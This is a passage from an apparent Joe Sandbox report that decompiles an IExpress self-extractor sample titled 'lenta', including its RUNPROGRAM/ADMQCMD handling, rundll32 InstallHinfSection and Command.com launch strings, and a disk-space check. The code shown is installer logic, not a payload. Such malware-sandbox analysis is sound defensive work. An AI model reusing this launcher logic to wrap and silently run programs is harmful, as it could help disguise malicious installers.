                                                                      									__eflags = _t108;
                                                                      									if(_t108 == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      									__eflags =  *0x11d8c42;
                                                                      									if( *0x11d8c42 != 0) {
                                                                      										goto L69;
                                                                      									}
                                                                      									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                      									__eflags = _t112 == 0;
                                                                      									if(_t112 == 0) {
                                                                      										goto L69;
                                                                      									}
                                                                      									goto L31;
                                                                      								}
                                                                      								_t118 =  *0x11d8a38; // 0x0
                                                                      								if(_t118 == 0) {
                                                                      									L23:
                                                                      									if(_t153 != 0) {
                                                                      										goto L31;
                                                                      									}
                                                                      									_t146 =  &_v276;
                                                                      									if(E011D468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                      										goto L27;
                                                                      									}
                                                                      									goto L25;
                                                                      								}
                                                                      								if((_t118 & 0x00000001) == 0) {
                                                                      									__eflags = _t118 & 0x00000002;
                                                                      									if((_t118 & 0x00000002) == 0) {
                                                                      										goto L62;
                                                                      									}
                                                                      									_t140 = "USRQCMD";
                                                                      									L20:
                                                                      									_t146 =  &_v276;
                                                                      									if(E011D468F(_t140,  &_v276, 0x104) == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                      										_t153 = 1;
                                                                      										_v388 = 1;
                                                                      									}
                                                                      									goto L23;
                                                                      								}
                                                                      								_t140 = "ADMQCMD";
                                                                      								goto L20;
                                                                      							}
                                                                      						}
                                                                      						L26:
                                                                      						_push(_t130);
                                                                      						_t146 = 0x104;
                                                                      						E011D1781( &_v276, 0x104, _t130, 0x11d8c42);
                                                                      						goto L27;
                                                                      					}
                                                                      				}
                                                                      				_t130 = "REBOOT";
                                                                      				_t125 = E011D468F(_t130, 0x11d9a2c, 4);
                                                                      				if(_t125 == 0 || _t125 > 4) {
                                                                      					goto L25;
                                                                      				} else {
                                                                      					goto L3;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • memset.MSVCRT ref: 011D3C11
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 011D3CDC
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,011D8C42), ref: 011D3D8F
                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 011D3E26
                                                                      • FreeLibrary.KERNEL32(00000000,?,011D8C42), ref: 011D3EFF
                                                                      • LocalFree.KERNEL32(?,?,?,?,011D8C42), ref: 011D3F1F
                                                                      • FreeLibrary.KERNEL32(00000000,?,011D8C42), ref: 011D3F40
                                                                      • LocalFree.KERNEL32(?,?,?,?,011D8C42), ref: 011D3F47
                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,011D8C42), ref: 011D3F76
                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,011D8C42), ref: 011D3F80
                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,011D8C42), ref: 011D3FC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                      • API String ID: 1032054927-778137101
                                                                      • Opcode ID: 9230d9b1a49aa0ef721702c440a93c90dc536577e873a8cde1d2f0407d8a0681
                                                                      • Instruction ID: fd48b626a44dbe0f5721d3cbcdf0e0b9a149b0f2d4c61d42f1497bc329e0ff81
                                                                      • Opcode Fuzzy Hash: 9230d9b1a49aa0ef721702c440a93c90dc536577e873a8cde1d2f0407d8a0681
                                                                      • Instruction Fuzzy Hash: C1B1D1B162A3159BE73CDF689844B6B7BE4FB84714F100A2DFAB5D6180D7748884CB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      [Figure: control-flow graph of function 011D1AE8; the decompiled code follows]
                                                                      C-Code - Quality: 82%
                                                                      			E011D1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v527;
                                                                      				char _v528;
                                                                      				char _v1552;
                                                                      				CHAR* _v1556;
                                                                      				int* _v1560;
                                                                      				CHAR** _v1564;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t48;
                                                                      				CHAR* _t53;
                                                                      				CHAR* _t54;
                                                                      				char* _t57;
                                                                      				char* _t58;
                                                                      				CHAR* _t60;
                                                                      				void* _t62;
                                                                      				signed char _t65;
                                                                      				intOrPtr _t76;
                                                                      				intOrPtr _t77;
                                                                      				unsigned int _t85;
                                                                      				CHAR* _t90;
                                                                      				CHAR* _t92;
                                                                      				char _t105;
                                                                      				char _t106;
                                                                      				CHAR** _t111;
                                                                      				CHAR* _t115;
                                                                      				intOrPtr* _t125;
                                                                      				void* _t126;
                                                                      				CHAR* _t132;
                                                                      				CHAR* _t135;
                                                                      				void* _t138;
                                                                      				void* _t139;
                                                                      				void* _t145;
                                                                      				intOrPtr* _t146;
                                                                      				char* _t148;
                                                                      				CHAR* _t151;
                                                                      				void* _t152;
                                                                      				CHAR* _t155;
                                                                      				CHAR* _t156;
                                                                      				void* _t157;
                                                                      				signed int _t158;
                                                                      
                                                                      				_t48 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t48 ^ _t158;
                                                                      				_t108 = __ecx;
                                                                      				_v1564 = _a4;
                                                                      				_v1560 = _a8;
                                                                      				E011D1680( &_v528, 0x104, __ecx);
                                                                      				if(_v528 != 0x22) {
                                                                      					_t135 = " ";
                                                                      					_t53 =  &_v528;
                                                                      				} else {
                                                                      					_t135 = "\"";
                                                                      					_t53 =  &_v527;
                                                                      				}
                                                                      				_t111 =  &_v1556;
                                                                      				_v1556 = _t53;
                                                                      				_t54 = E011D1A84(_t111, _t135);
                                                                      				_t156 = _v1556;
                                                                      				_t151 = _t54;
                                                                      				if(_t156 == 0) {
                                                                      					L12:
                                                                      					_push(_t111);
                                                                      					E011D1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      					E011D658A( &_v268, 0x104, _t156);
                                                                      					goto L13;
                                                                      				} else {
                                                                      					_t132 = _t156;
                                                                      					_t148 =  &(_t132[1]);
                                                                      					do {
                                                                      						_t105 =  *_t132;
                                                                      						_t132 =  &(_t132[1]);
                                                                      					} while (_t105 != 0);
                                                                      					_t111 = _t132 - _t148;
                                                                      					if(_t111 < 3) {
                                                                      						goto L12;
                                                                      					}
                                                                      					_t106 = _t156[1];
                                                                      					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                      						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                      							goto L12;
                                                                      						} else {
                                                                      							goto L11;
                                                                      						}
                                                                      					} else {
                                                                      						L11:
                                                                      						E011D1680( &_v268, 0x104, _t156);
                                                                      						L13:
                                                                      						_t138 = 0x2e;
                                                                      						_t57 = E011D66C8(_t156, _t138);
                                                                      						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                      							_t139 = 0x2e;
                                                                      							_t115 = _t156;
                                                                      							_t58 = E011D66C8(_t115, _t139);
                                                                      							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                      								_t156 = LocalAlloc(0x40, 0x400);
                                                                      								if(_t156 == 0) {
                                                                      									goto L43;
                                                                      								}
                                                                      								_t65 = GetFileAttributesA( &_v268); // executed
                                                                      								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                      									E011D1680( &_v1552, 0x400, _t108);
                                                                      								} else {
                                                                      									_push(_t115);
                                                                      									_t108 = 0x400;
                                                                      									E011D1781( &_v1552, 0x400, _t115,  &_v268);
                                                                      									if(_t151 != 0 &&  *_t151 != 0) {
                                                                      										E011D16B3( &_v1552, 0x400, " ");
                                                                      										E011D16B3( &_v1552, 0x400, _t151);
                                                                      									}
                                                                      								}
                                                                      								_t140 = _t156;
                                                                      								 *_t156 = 0;
                                                                      								E011D2AAC( &_v1552, _t156, _t156);
                                                                      								goto L53;
                                                                      							} else {
                                                                      								_t108 = "Command.com /c %s";
                                                                      								_t125 = "Command.com /c %s";
                                                                      								_t145 = _t125 + 1;
                                                                      								do {
                                                                      									_t76 =  *_t125;
                                                                      									_t125 = _t125 + 1;
                                                                      								} while (_t76 != 0);
                                                                      								_t126 = _t125 - _t145;
                                                                      								_t146 =  &_v268;
                                                                      								_t157 = _t146 + 1;
                                                                      								do {
                                                                      									_t77 =  *_t146;
                                                                      									_t146 = _t146 + 1;
                                                                      								} while (_t77 != 0);
                                                                      								_t140 = _t146 - _t157;
                                                                      								_t154 = _t126 + 8 + _t146 - _t157;
                                                                      								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                      								if(_t156 != 0) {
                                                                      									E011D171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                      									goto L53;
                                                                      								}
                                                                      								goto L43;
                                                                      							}
                                                                      						} else {
                                                                      							_t85 = GetFileAttributesA( &_v268);
                                                                      							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                      								_t140 = 0x525;
                                                                      								_push(0);
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_t60 =  &_v268;
                                                                      								goto L35;
                                                                      							} else {
                                                                      								_t140 = "[";
                                                                      								_v1556 = _t151;
                                                                      								_t90 = E011D1A84( &_v1556, "[");
                                                                      								if(_t90 != 0) {
                                                                      									if( *_t90 != 0) {
                                                                      										_v1556 = _t90;
                                                                      									}
                                                                      									_t140 = "]";
                                                                      									E011D1A84( &_v1556, "]");
                                                                      								}
                                                                      								_t156 = LocalAlloc(0x40, 0x200);
                                                                      								if(_t156 == 0) {
                                                                      									L43:
                                                                      									_t60 = 0;
                                                                      									_t140 = 0x4b5;
                                                                      									_push(0);
                                                                      									_push(0x10);
                                                                      									_push(0);
                                                                      									L35:
                                                                      									_push(_t60);
                                                                      									E011D44B9(0, _t140);
                                                                      									_t62 = 0;
                                                                      									goto L54;
                                                                      								} else {
                                                                      									_t155 = _v1556;
                                                                      									_t92 = _t155;
                                                                      									if( *_t155 == 0) {
                                                                      										_t92 = "DefaultInstall";
                                                                      									}
                                                                      									 *0x11d9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                      									 *_v1560 = 1;
                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x11d1140, _t156, 8,  &_v268) == 0) {
                                                                      										 *0x11d9a34 =  *0x11d9a34 & 0xfffffffb;
                                                                      										if( *0x11d9a40 != 0) {
                                                                      											_t108 = "setupapi.dll";
                                                                      										} else {
                                                                      											_t108 = "setupx.dll";
                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                      										}
                                                                      										if( *_t155 == 0) {
                                                                      											_t155 = "DefaultInstall";
                                                                      										}
                                                                      										_push( &_v268);
                                                                      										_push(_t155);
                                                                      										E011D171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                      									} else {
                                                                      										 *0x11d9a34 =  *0x11d9a34 | 0x00000004;
                                                                      										if( *_t155 == 0) {
                                                                      											_t155 = "DefaultInstall";
                                                                      										}
                                                                      										E011D1680(_t108, 0x104, _t155);
                                                                      										_t140 = 0x200;
                                                                      										E011D1680(_t156, 0x200,  &_v268);
                                                                      									}
                                                                      									L53:
                                                                      									_t62 = 1;
                                                                      									 *_v1564 = _t156;
                                                                      									L54:
                                                                      									_pop(_t152);
                                                                      									return E011D6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}














































                                                                      0x011d1dd2
                                                                      0x011d1deb
                                                                      0x00000000
                                                                      0x011d1df0
                                                                      0x00000000
                                                                      0x011d1dd2
                                                                      0x011d1bf7
                                                                      0x011d1bfe
                                                                      0x011d1c07
                                                                      0x011d1d55
                                                                      0x011d1d5a
                                                                      0x011d1d5b
                                                                      0x011d1d5d
                                                                      0x011d1d5e
                                                                      0x00000000
                                                                      0x011d1c1b
                                                                      0x011d1c1b
                                                                      0x011d1c20
                                                                      0x011d1c2c
                                                                      0x011d1c33
                                                                      0x011d1c38
                                                                      0x011d1c3a
                                                                      0x011d1c3a
                                                                      0x011d1c40
                                                                      0x011d1c4b
                                                                      0x011d1c4b
                                                                      0x011d1c5d
                                                                      0x011d1c61
                                                                      0x011d1dd4
                                                                      0x011d1dd4
                                                                      0x011d1dd6
                                                                      0x011d1ddb
                                                                      0x011d1ddc
                                                                      0x011d1dde
                                                                      0x011d1d64
                                                                      0x011d1d64
                                                                      0x011d1d67
                                                                      0x011d1d6c
                                                                      0x00000000
                                                                      0x011d1c67
                                                                      0x011d1c67
                                                                      0x011d1c6d
                                                                      0x011d1c72
                                                                      0x011d1c74
                                                                      0x011d1c74
                                                                      0x011d1c8e
                                                                      0x011d1c99
                                                                      0x011d1cc0
                                                                      0x011d1cf8
                                                                      0x011d1d07
                                                                      0x011d1d23
                                                                      0x011d1d09
                                                                      0x011d1d14
                                                                      0x011d1d1b
                                                                      0x011d1d1b
                                                                      0x011d1d2b
                                                                      0x011d1d2d
                                                                      0x011d1d2d
                                                                      0x011d1d38
                                                                      0x011d1d39
                                                                      0x011d1d46
                                                                      0x011d1cc2
                                                                      0x011d1cc2
                                                                      0x011d1ccc
                                                                      0x011d1cce
                                                                      0x011d1cce
                                                                      0x011d1cdb
                                                                      0x011d1ce6
                                                                      0x011d1cee
                                                                      0x011d1cee
                                                                      0x011d1e89
                                                                      0x011d1e91
                                                                      0x011d1e92
                                                                      0x011d1e94
                                                                      0x011d1e97
                                                                      0x011d1ea4
                                                                      0x011d1ea4
                                                                      0x011d1c61
                                                                      0x011d1c07
                                                                      0x011d1bd3
                                                                      0x011d1b7b

                                                                      APIs
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 011D1BE7
                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 011D1BFE
                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 011D1C57
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 011D1C88
                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,011D1140,00000000,00000008,?), ref: 011D1CB8
                                                                      • GetShortPathNameA.KERNEL32 ref: 011D1D1B
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                      • API String ID: 383838535-3368923722
                                                                      • Opcode ID: 26175ca9ee12eaa4888b169dfb6426597a471f6cf36367bfb9033925e3a116f4
                                                                      • Instruction ID: 746587fc5310d05d3a81003d002939be4b49b45355cca8176c75d9e66d9b2cfc
                                                                      • Opcode Fuzzy Hash: 26175ca9ee12eaa4888b169dfb6426597a471f6cf36367bfb9033925e3a116f4
                                                                      • Instruction Fuzzy Hash: 90A146B0A002197BEF2DDB38CC44FEA7B69AF51314F144298E955A32C1DBB49EC5CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 324 11d597d-11d59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 11d59dd-11d5a1b GetDiskFreeSpaceA 324->325 326 11d59bb-11d59d8 call 11d44b9 call 11d6285 324->326 327 11d5ba1-11d5bde memset call 11d6285 GetLastError FormatMessageA 325->327 328 11d5a21-11d5a4a MulDiv 325->328 341 11d5c05-11d5c14 call 11d6ce0 326->341 337 11d5be3-11d5bfc call 11d44b9 SetCurrentDirectoryA 327->337 328->327 331 11d5a50-11d5a6c GetVolumeInformationA 328->331 334 11d5a6e-11d5ab0 memset call 11d6285 GetLastError FormatMessageA 331->334 335 11d5ab5-11d5aca SetCurrentDirectoryA 331->335 334->337 339 11d5acc-11d5ad1 335->339 351 11d5c02 337->351 344 11d5ad3-11d5ad8 339->344 345 11d5ae2-11d5ae4 339->345 344->345 347 11d5ada-11d5ae0 344->347 349 11d5ae7-11d5af8 345->349 350 11d5ae6 345->350 347->339 347->345 353 11d5af9-11d5afb 349->353 350->349 354 11d5c04 351->354 355 11d5afd-11d5b03 353->355 356 11d5b05-11d5b08 353->356 354->341 355->353 355->356 357 11d5b0a-11d5b1b call 11d44b9 356->357 358 11d5b20-11d5b27 356->358 357->351 360 11d5b29-11d5b33 358->360 361 11d5b52-11d5b5b 358->361 360->361 363 11d5b35-11d5b50 360->363 364 11d5b62-11d5b6d 361->364 363->364 365 11d5b6f-11d5b74 364->365 366 11d5b76-11d5b7d 364->366 367 11d5b85 365->367 368 11d5b7f-11d5b81 366->368 369 11d5b83 366->369 370 11d5b87-11d5b94 call 11d268b 367->370 371 11d5b96-11d5b9f 367->371 368->367 369->367 370->354 371->354
                                                                      C-Code - Quality: 96%
                                                                      			E011D597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				char _v16;
                                                                      				char _v276;
                                                                      				char _v788;
                                                                      				long _v792;
                                                                      				long _v796;
                                                                      				long _v800;
                                                                      				signed int _v804;
                                                                      				long _v808;
                                                                      				int _v812;
                                                                      				long _v816;
                                                                      				long _v820;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				signed int _t46;
                                                                      				int _t50;
                                                                      				signed int _t55;
                                                                      				void* _t66;
                                                                      				int _t69;
                                                                      				signed int _t73;
                                                                      				signed short _t78;
                                                                      				signed int _t87;
                                                                      				signed int _t101;
                                                                      				int _t102;
                                                                      				unsigned int _t103;
                                                                      				unsigned int _t105;
                                                                      				signed int _t111;
                                                                      				long _t112;
                                                                      				signed int _t116;
                                                                      				CHAR* _t118;
                                                                      				signed int _t119;
                                                                      				signed int _t120;
                                                                      
                                                                      				_t114 = __edi;
                                                                      				_t46 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t46 ^ _t120;
                                                                      				_v804 = __edx;
                                                                      				_t118 = __ecx;
                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                      				if(_t50 != 0) {
                                                                      					_push(__edi);
                                                                      					_v796 = 0;
                                                                      					_v792 = 0;
                                                                      					_v800 = 0;
                                                                      					_v808 = 0;
                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                      					__eflags = _t55;
                                                                      					if(_t55 == 0) {
                                                                      						L29:
                                                                      						memset( &_v788, 0, 0x200);
                                                                      						 *0x11d9124 = E011D6285();
                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                      						_t110 = 0x4b0;
                                                                      						L30:
                                                                      						__eflags = 0;
                                                                      						E011D44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                      						SetCurrentDirectoryA( &_v276);
                                                                      						L31:
                                                                      						_t66 = 0;
                                                                      						__eflags = 0;
                                                                      						L32:
                                                                      						_pop(_t114);
                                                                      						goto L33;
                                                                      					}
                                                                      					_t69 = _v792 * _v796;
                                                                      					_v812 = _t69;
                                                                      					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                      					__eflags = _t116;
                                                                      					if(_t116 == 0) {
                                                                      						goto L29;
                                                                      					}
                                                                      					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                      					__eflags = _t73;
                                                                      					if(_t73 != 0) {
                                                                      						SetCurrentDirectoryA( &_v276); // executed
                                                                      						_t101 =  &_v16;
                                                                      						_t111 = 6;
                                                                      						_t119 = _t118 - _t101;
                                                                      						__eflags = _t119;
                                                                      						while(1) {
                                                                      							_t22 = _t111 - 4; // 0x2
                                                                      							__eflags = _t22;
                                                                      							if(_t22 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                      							__eflags = _t87;
                                                                      							if(_t87 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							 *_t101 = _t87;
                                                                      							_t101 = _t101 + 1;
                                                                      							_t111 = _t111 - 1;
                                                                      							__eflags = _t111;
                                                                      							if(_t111 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _t111;
                                                                      						if(_t111 == 0) {
                                                                      							_t101 = _t101 - 1;
                                                                      							__eflags = _t101;
                                                                      						}
                                                                      						 *_t101 = 0;
                                                                      						_t112 = 0x200;
                                                                      						_t102 = _v812;
                                                                      						_t78 = 0;
                                                                      						_t118 = 8;
                                                                      						while(1) {
                                                                      							__eflags = _t102 - _t112;
                                                                      							if(_t102 == _t112) {
                                                                      								break;
                                                                      							}
                                                                      							_t112 = _t112 + _t112;
                                                                      							_t78 = _t78 + 1;
                                                                      							__eflags = _t78 - _t118;
                                                                      							if(_t78 < _t118) {
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _t78 - _t118;
                                                                      						if(_t78 != _t118) {
                                                                      							__eflags =  *0x11d9a34 & 0x00000008;
                                                                      							if(( *0x11d9a34 & 0x00000008) == 0) {
                                                                      								L20:
                                                                      								_t103 =  *0x11d9a38; // 0x0
                                                                      								_t110 =  *((intOrPtr*)(0x11d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                      								L21:
                                                                      								__eflags = (_v804 & 0x00000003) - 3;
                                                                      								if((_v804 & 0x00000003) != 3) {
                                                                      									__eflags = _v804 & 0x00000001;
                                                                      									if((_v804 & 0x00000001) == 0) {
                                                                      										__eflags = _t103 - _t116;
                                                                      									} else {
                                                                      										__eflags = _t110 - _t116;
                                                                      									}
                                                                      								} else {
                                                                      									__eflags = _t103 + _t110 - _t116;
                                                                      								}
                                                                      								if(__eflags <= 0) {
                                                                      									 *0x11d9124 = 0;
                                                                      									_t66 = 1;
                                                                      								} else {
                                                                      									_t66 = E011D268B(_a4, _t110, _t103,  &_v16);
                                                                      								}
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags = _v816 & 0x00008000;
                                                                      							if((_v816 & 0x00008000) == 0) {
                                                                      								goto L20;
                                                                      							}
                                                                      							_t105 =  *0x11d9a38; // 0x0
                                                                      							_t110 =  *((intOrPtr*)(0x11d89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x11d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                      							_t103 = (_t105 >> 2) +  *0x11d9a38;
                                                                      							goto L21;
                                                                      						}
                                                                      						_t110 = 0x4c5;
                                                                      						E011D44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                      						goto L31;
                                                                      					}
                                                                      					memset( &_v788, 0, 0x200);
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                      					_t110 = 0x4f9;
                                                                      					goto L30;
                                                                      				} else {
                                                                      					_t110 = 0x4bc;
                                                                      					E011D44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					_t66 = 0;
                                                                      					L33:
                                                                      					return E011D6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                      				}
                                                                      			}




































                                                                      APIs
                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 011D59A8
                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 011D59AF
                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 011D5A13
                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 011D5A40
                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 011D5A64
                                                                      • memset.MSVCRT ref: 011D5A7C
                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 011D5A98
                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 011D5AA5
                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 011D5BFC
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                        • Part of subcall function 011D6285: GetLastError.KERNEL32(011D5BBC), ref: 011D6285
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                      • String ID:
                                                                      • API String ID: 4237285672-0
                                                                      • Opcode ID: 0458179211a8d20c6f617775f923ac8fbdcdcefd7b681b29299b69aef0795783
                                                                      • Instruction ID: 9d7e44c4ee8a8cd27401c8198188bd1cf46459e185bf46f8341c905be9978613
                                                                      • Opcode Fuzzy Hash: 0458179211a8d20c6f617775f923ac8fbdcdcefd7b681b29299b69aef0795783
                                                                      • Instruction Fuzzy Hash: C371A1B190221CAFEB6EDB64DC84BFB77BEEB48344F0440A9E51596144EB349E84CF21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
